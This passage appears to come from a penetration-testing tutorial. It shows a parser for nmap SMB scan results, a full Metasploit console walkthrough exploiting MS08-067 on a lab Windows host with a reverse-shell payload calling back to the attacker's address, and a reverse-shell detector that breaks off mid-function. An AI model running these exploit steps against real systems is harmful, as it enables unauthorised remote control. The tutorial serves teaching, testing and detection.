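def vulnerable_scripts(results: List[ScriptResult]) -> List[str]:
    """Names of the scripts whose reported state is VULNERABLE, in report order."""
    return [r.name for r in results if r.state == "VULNERABLE"]


# Host script section abridged from the scan output above.
SAMPLE_REPORT = """\
Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|     Disclosure date: 2008-10-23
|     References:
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
"""


if __name__ == "__main__":
    parsed = parse_host_scripts(SAMPLE_REPORT)
    for r in parsed:
        cves = ", ".join(r.cves) or "-"
        print(f"{r.name:28} {r.state:15} {cves:16} {r.title or r.detail or ''}")
    print("act on:", vulnerable_scripts(parsed))
```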

Exploiting vulnerabilities automatically with Metasploit

Now that we have detected and chosen the vulnerability to exploit, let's move on to Metasploit. With Metasploit it is possible to exploit applications automatically without having to search for exploits in online databases.

Metasploit – Search module

Once Metasploit has started, search for the exploit with the following command: "search ms08-067". Metasploit will show the modules found.

msf > search ms08-067

Matching Modules
================

   Name                                 Disclosure Date  Rank   Description
   ----                                 ---------------  ----   -----------
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great  MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf > 


Metasploit – Use

To use a module run "use" followed by the module, as follows:

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) >

Metasploit – Show and set target

To see the list of targets for the exploit run the command show targets.

msf exploit(windows/smb/ms08_067_netapi) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese - Brazilian (NX)
   68  Windows 2003 SP2 Spanish (NO NX)
   69  Windows 2003 SP2 Spanish (NX)
   70  Windows 2003 SP2 Japanese (NO NX)
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)


msf exploit(windows/smb/ms08_067_netapi) > 

Clearly, in most cases there is no need to choose the target: Metasploit automatically detects the operating system in use. So leave it at 0, automatic.

If you should ever need to set the target manually, use the following command:

msf exploit(windows/smb/ms08_067_netapi) > set target 45
target => 45
msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   45  Windows XP SP3 Italian (NX)


msf exploit(windows/smb/ms08_067_netapi) >

Metasploit – Show options

Now, the rest of the data to enter in order to run the exploit successfully is shown by the command "show options".

msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) >

Metasploit module option RHOST

RHOST, which stands for remote host, is the host to attack/test, in this example the IP address 10.10.10.7.

Metasploit module option RPORT

RPORT (remote port) is filled in automatically by Metasploit because port 445 is the standard port of the application to exploit. Leave it as it is in most cases.

Metasploit module option SMBPIPE

As with the port (RPORT), leave the default setting, BROWSER.

Metasploit – Set RHOST

msf exploit(windows/smb/ms08_067_netapi) > set rhost 10.10.10.7
rhost => 10.10.10.7
msf exploit(windows/smb/ms08_067_netapi) >

Every time something is changed you can check with the command "show options" whether the change was applied successfully.

msf exploit(windows/smb/ms08_067_netapi) > show options 

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.7       yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(windows/smb/ms08_067_netapi) >

Metasploit – Check

Once the data needed to run the exploit correctly has been entered, you can check whether the host is vulnerable to an attack with the check command.

msf exploit(windows/smb/ms08_067_netapi) > check
[+] 10.10.10.7:445 The target is vulnerable.
msf exploit(windows/smb/ms08_067_netapi) >

Metasploit – Payloads

We are not done yet: now we have to tell Metasploit what to do once the target has been exploited. Just choose a compatible payload to run after the exploit has succeeded.

Metasploit – Show payloads

To see a list of compatible payloads available for this module run the command "show payloads".

msf exploit(windows/smb/ms08_067_netapi) > show payloads

Compatible Payloads
===================

   Name                                                Disclosure Date  Rank    Description
   ----                                                ---------------  ----    -----------
   generic/custom                                                       normal  Custom Payload
   generic/debug_trap                                                   normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                               normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                            normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                   normal  Generic x86 Tight Loop
   windows/adduser                                                      normal  Windows Execute net user /ADD
   windows/dllinject/bind_hidden_ipknock_tcp                            normal  Reflective DLL Injection, Hidden Bind Ipknock TCP Stager
   windows/dllinject/bind_hidden_tcp                                    normal  Reflective DLL Injection, Hidden Bind TCP Stager
   windows/dllinject/bind_ipv6_tcp                                      normal  Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
   windows/dllinject/bind_ipv6_tcp_uuid                                 normal  Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/dllinject/bind_named_pipe                                    normal  Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
   windows/dllinject/bind_nonx_tcp                                      normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                           normal  Reflective DLL Injection, Bind TCP Stager (Windows x86)
   windows/dllinject/bind_tcp_rc4                                       normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/dllinject/bind_tcp_uuid                                      normal  Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
   windows/dllinject/reverse_hop_http                                   normal  Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
   windows/dllinject/reverse_http                                       normal  Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
   windows/dllinject/reverse_ipv6_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                   normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                    normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                        normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                               normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                    normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                    normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/dllinject/reverse_tcp_uuid                                   normal  Reflective DLL Injection, Reverse TCP Stager with UUID Support
   windows/dllinject/reverse_udp                                        normal  Reflective DLL Injection, Reverse UDP Stager with UUID Support
   windows/dns_txt_query_exec                                           normal  DNS TXT Record Payload Download and Execution
   windows/exec                                                         normal  Windows Execute Command
   windows/format_all_drives                                            manual  Windows Drive Formatter
   windows/loadlibrary                                                  normal  Windows LoadLibrary Path
   windows/messagebox                                                   normal  Windows MessageBox
   windows/meterpreter/bind_hidden_ipknock_tcp                          normal  Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
   windows/meterpreter/bind_hidden_tcp                                  normal  Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
   windows/meterpreter/bind_ipv6_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/meterpreter/bind_ipv6_tcp_uuid                               normal  Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/meterpreter/bind_named_pipe                                  normal  Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
   windows/meterpreter/bind_nonx_tcp                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/meterpreter/bind_tcp                                         normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
   windows/meterpreter/bind_tcp_rc4                                     normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/meterpreter/bind_tcp_uuid                                    normal  Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/meterpreter/reverse_hop_http                                 normal  Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   windows/meterpreter/reverse_http                                     normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   windows/meterpreter/reverse_https                                    normal  Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
   windows/meterpreter/reverse_https_proxy                              normal  Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
   windows/meterpreter/reverse_ipv6_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/meterpreter/reverse_named_pipe                               normal  Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
   windows/meterpreter/reverse_nonx_tcp                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp                                  normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_tcp                                      normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   windows/meterpreter/reverse_tcp_allports                             normal  Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
   windows/meterpreter/reverse_tcp_dns                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
   windows/meterpreter/reverse_tcp_rc4                                  normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/meterpreter/reverse_tcp_uuid                                 normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
   windows/meterpreter/reverse_udp                                      normal  Windows Meterpreter (Reflective Injection), Reverse UDP Stager with UUID Support
   windows/metsvc_bind_tcp                                              normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                                           normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/bind_hidden_ipknock_tcp                     normal  Windows Inject DLL, Hidden Bind Ipknock TCP Stager
   windows/patchupdllinject/bind_hidden_tcp                             normal  Windows Inject DLL, Hidden Bind TCP Stager
   windows/patchupdllinject/bind_ipv6_tcp                               normal  Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
   windows/patchupdllinject/bind_ipv6_tcp_uuid                          normal  Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/patchupdllinject/bind_named_pipe                             normal  Windows Inject DLL, Windows x86 Bind Named Pipe Stager
   windows/patchupdllinject/bind_nonx_tcp                               normal  Windows Inject DLL, Bind TCP Stager (No NX or Win7)
   windows/patchupdllinject/bind_tcp                                    normal  Windows Inject DLL, Bind TCP Stager (Windows x86)
   windows/patchupdllinject/bind_tcp_rc4                                normal  Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupdllinject/bind_tcp_uuid                               normal  Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
   windows/patchupdllinject/reverse_ipv6_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (IPv6)
   windows/patchupdllinject/reverse_nonx_tcp                            normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp                             normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_tcp                                 normal  Windows Inject DLL, Reverse TCP Stager
   windows/patchupdllinject/reverse_tcp_allports                        normal  Windows Inject DLL, Reverse All-Port TCP Stager
   windows/patchupdllinject/reverse_tcp_dns                             normal  Windows Inject DLL, Reverse TCP Stager (DNS)
   windows/patchupdllinject/reverse_tcp_rc4                             normal  Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupdllinject/reverse_tcp_uuid                            normal  Windows Inject DLL, Reverse TCP Stager with UUID Support
   windows/patchupdllinject/reverse_udp                                 normal  Windows Inject DLL, Reverse UDP Stager with UUID Support
   windows/patchupmeterpreter/bind_hidden_ipknock_tcp                   normal  Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
   windows/patchupmeterpreter/bind_hidden_tcp                           normal  Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
   windows/patchupmeterpreter/bind_ipv6_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/patchupmeterpreter/bind_ipv6_tcp_uuid                        normal  Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/patchupmeterpreter/bind_named_pipe                           normal  Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
   windows/patchupmeterpreter/bind_nonx_tcp                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/bind_tcp                                  normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
   windows/patchupmeterpreter/bind_tcp_rc4                              normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupmeterpreter/bind_tcp_uuid                             normal  Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/patchupmeterpreter/reverse_ipv6_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
   windows/patchupmeterpreter/reverse_nonx_tcp                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp                           normal  Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_tcp                               normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
   windows/patchupmeterpreter/reverse_tcp_allports                      normal  Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
   windows/patchupmeterpreter/reverse_tcp_dns                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
   windows/patchupmeterpreter/reverse_tcp_rc4                           normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/patchupmeterpreter/reverse_tcp_uuid                          normal  Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
   windows/patchupmeterpreter/reverse_udp                               normal  Windows Meterpreter (skape/jt Injection), Reverse UDP Stager with UUID Support
   windows/shell/bind_hidden_ipknock_tcp                                normal  Windows Command Shell, Hidden Bind Ipknock TCP Stager
   windows/shell/bind_hidden_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Stager
   windows/shell/bind_ipv6_tcp                                          normal  Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
   windows/shell/bind_ipv6_tcp_uuid                                     normal  Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/shell/bind_named_pipe                                        normal  Windows Command Shell, Windows x86 Bind Named Pipe Stager
   windows/shell/bind_nonx_tcp                                          normal  Windows Command Shell, Bind TCP Stager (No NX or Win7)
   windows/shell/bind_tcp                                               normal  Windows Command Shell, Bind TCP Stager (Windows x86)
   windows/shell/bind_tcp_rc4                                           normal  Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/shell/bind_tcp_uuid                                          normal  Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
   windows/shell/reverse_ipv6_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp                                       normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                                        normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Stager
   windows/shell/reverse_tcp_allports                                   normal  Windows Command Shell, Reverse All-Port TCP Stager
   windows/shell/reverse_tcp_dns                                        normal  Windows Command Shell, Reverse TCP Stager (DNS)
   windows/shell/reverse_tcp_rc4                                        normal  Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/shell/reverse_tcp_uuid                                       normal  Windows Command Shell, Reverse TCP Stager with UUID Support
   windows/shell/reverse_udp                                            normal  Windows Command Shell, Reverse UDP Stager with UUID Support
   windows/shell_bind_tcp                                               normal  Windows Command Shell, Bind TCP Inline
   windows/shell_hidden_bind_tcp                                        normal  Windows Command Shell, Hidden Bind TCP Inline
   windows/shell_reverse_tcp                                            normal  Windows Command Shell, Reverse TCP Inline
   windows/speak_pwned                                                  normal  Windows Speech API - Say "You Got Pwned!"
   windows/upexec/bind_hidden_ipknock_tcp                               normal  Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
   windows/upexec/bind_hidden_tcp                                       normal  Windows Upload/Execute, Hidden Bind TCP Stager
   windows/upexec/bind_ipv6_tcp                                         normal  Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
   windows/upexec/bind_ipv6_tcp_uuid                                    normal  Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/upexec/bind_named_pipe                                       normal  Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
   windows/upexec/bind_nonx_tcp                                         normal  Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
   windows/upexec/bind_tcp                                              normal  Windows Upload/Execute, Bind TCP Stager (Windows x86)
   windows/upexec/bind_tcp_rc4                                          normal  Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/upexec/bind_tcp_uuid                                         normal  Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
   windows/upexec/reverse_ipv6_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (IPv6)
   windows/upexec/reverse_nonx_tcp                                      normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp                                       normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_tcp                                           normal  Windows Upload/Execute, Reverse TCP Stager
   windows/upexec/reverse_tcp_allports                                  normal  Windows Upload/Execute, Reverse All-Port TCP Stager
   windows/upexec/reverse_tcp_dns                                       normal  Windows Upload/Execute, Reverse TCP Stager (DNS)
   windows/upexec/reverse_tcp_rc4                                       normal  Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/upexec/reverse_tcp_uuid                                      normal  Windows Upload/Execute, Reverse TCP Stager with UUID Support
   windows/upexec/reverse_udp                                           normal  Windows Upload/Execute, Reverse UDP Stager with UUID Support
   windows/vncinject/bind_hidden_ipknock_tcp                            normal  VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
   windows/vncinject/bind_hidden_tcp                                    normal  VNC Server (Reflective Injection), Hidden Bind TCP Stager
   windows/vncinject/bind_ipv6_tcp                                      normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
   windows/vncinject/bind_ipv6_tcp_uuid                                 normal  VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
   windows/vncinject/bind_named_pipe                                    normal  VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
   windows/vncinject/bind_nonx_tcp                                      normal  VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
   windows/vncinject/bind_tcp                                           normal  VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
   windows/vncinject/bind_tcp_rc4                                       normal  VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
   windows/vncinject/bind_tcp_uuid                                      normal  VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
   windows/vncinject/reverse_hop_http                                   normal  VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
   windows/vncinject/reverse_http                                       normal  VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
   windows/vncinject/reverse_ipv6_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
   windows/vncinject/reverse_nonx_tcp                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp                                    normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_tcp                                        normal  VNC Server (Reflective Injection), Reverse TCP Stager
   windows/vncinject/reverse_tcp_allports                               normal  VNC Server (Reflective Injection), Reverse All-Port TCP Stager
   windows/vncinject/reverse_tcp_dns                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
   windows/vncinject/reverse_tcp_rc4                                    normal  VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
   windows/vncinject/reverse_tcp_uuid                                   normal  VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
   windows/vncinject/reverse_udp                                        normal  VNC Server (Reflective Injection), Reverse UDP Stager with UUID Support

msf exploit(windows/smb/ms08_067_netapi) > 

Metasploit – Set a Payload manually

In this example the payload windows/shell/reverse_tcp will be used, which allows commands to be run as administrator on the targeted machine. There are two kinds of shells, bind shells and reverse shells.
BIND SHELLS
A bind shell instructs the target to run a shell and listen on a specific port. The problem is that every firewall is configured by default to block all incoming traffic (on all ports), so this technique would be of little use.
REVERSE SHELLS
With a reverse shell it is the attacker who has an open port and acts as the server; this way the firewall rules can be evaded.

To use a payload, run the set payload command as follows:

msf exploit(windows/smb/ms08_067_netapi) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(windows/smb/ms08_067_netapi) >

To see what information must be supplied with this new setting, run the show options command again.

msf exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.7       yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   45  Windows XP SP3 Italian (NX)


msf exploit(windows/smb/ms08_067_netapi) >

As the command output shows, you now have to enter your own IP address (the one from which the Windows machine is being attacked); LHOST stands for local host.

msf exploit(windows/smb/ms08_067_netapi) > set lhost 10.10.10.5
lhost => 10.10.10.5
msf exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    10.10.10.7       yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.10.5       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   45  Windows XP SP3 Italian (NX)


msf exploit(windows/smb/ms08_067_netapi) >

We now have everything needed to run the exploit successfully with the chosen payload.

Metasploit – Exploit

msf exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.10.5:4444 
[*] 10.10.10.7:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 10.10.10.7
[*] Command shell session 1 opened (10.10.10.5:4444 -> 10.10.10.7:1037) at 2019-03-04 12:30:23 +0100


C:\WINDOWS\system32>

As can be seen, the exploit succeeded and a Windows command prompt appears, from which practically anything can be done on the victim's machine.
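The session line above (10.10.10.5:4444 -> 10.10.10.7:1037) is what a reverse shell looks like from the network: a host that has just received SMB traffic from a peer connects back to that peer on an unusual port. The Python detector below is an added example, not part of the original post; it correlates that pattern over a constructed connection log, and the log format is an assumption to adapt to your firewall or NetFlow export.

```python
"""Flag hosts that receive SMB from a peer and then open an outbound
connection back to the same peer on a non-standard port shortly after.
Added example; the log format and lines are constructed for illustration."""
from datetime import datetime, timedelta
import re

# Constructed sample log: timestamp, source, destination, protocol.
# The third line reproduces the session opened in the exploit output above.
SAMPLE_LOG = """\
2019-03-04 12:29:58 10.10.10.5:49210 -> 10.10.10.7:445 tcp
2019-03-04 12:30:01 10.10.10.9:51000 -> 10.10.10.7:445 tcp
2019-03-04 12:30:23 10.10.10.7:1037 -> 10.10.10.5:4444 tcp
2019-03-04 12:31:10 10.10.10.7:1038 -> 10.10.10.1:53 udp
2019-03-04 12:40:00 10.10.10.7:1040 -> 10.10.10.9:443 tcp
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+) (?P<src>[\d.]+):(?P<sport>\d+) -> "
    r"(?P<dst>[\d.]+):(?P<dport>\d+) (?P<proto>\w+)$"
)

SERVICE_PORTS = {445, 139}       # inbound services an SMB exploit would hit
EXPECTED_EGRESS = {53, 80, 443}  # ports a server legitimately initiates to
WINDOW = timedelta(minutes=5)    # how soon after the SMB contact we correlate


def parse_log(text):
    """Parse the constructed log format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # skip malformed lines rather than abort the whole scan
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"),
            "src": m["src"], "sport": int(m["sport"]),
            "dst": m["dst"], "dport": int(m["dport"]),
            "proto": m["proto"],
        })
    return events


def find_reverse_shell_candidates(events, window=WINDOW):
    """Return (victim, attacker, port, ts) for each outbound connection that
    a host initiated back to a peer which had contacted its SMB service
    within `window`, on a port outside the expected egress set."""
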